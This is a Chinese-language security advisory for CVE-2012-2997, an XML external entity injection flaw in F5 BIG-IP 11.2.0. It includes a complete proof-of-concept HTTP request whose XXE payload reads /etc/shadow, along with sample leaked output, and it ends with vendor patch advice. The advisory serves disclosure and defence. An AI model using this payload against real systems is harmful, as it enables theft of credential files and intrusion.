F5 BIG-IP XML外部实体注入漏洞
发布日期:2013-01-22
更新日期:2013-01-23
受影响系统:F5 BigIP 11.2.0
描述:
BUGTRAQ ID:
57496
CVE(CAN) ID:
CVE-2012-2997
F5 BIG-IP产品可为企业提供集成的应用交付服务,如加速、安全、访问控制与高可用性。
F5 BIG-IP在实现上存在XML外部实体注入漏洞,成功利用后可允许攻击者获取本地文件内容。
<*来源:S. Viehböck
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143
<?xml version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>
The response includes the content of the file:
<?xml version="1.0" encoding="utf-8"?>
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client
has sent unknown dialogueType '
root:--hash--:15490::::::
bin:*:15490::::::
daemon:*:15490::::::
adm:*:15490::::::
lp:*:15490::::::
mail:*:15490::::::
uucp:*:15490::::::
operator:*:15490::::::
nobody:*:15490::::::
tmshnobody:*:15490::::::
admin:--hash--:15490:0:99999:7:::
建议:
厂商补丁:
F5
--
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.f5.com/bigip浏览次数:4168
严重程度:0(网友投票)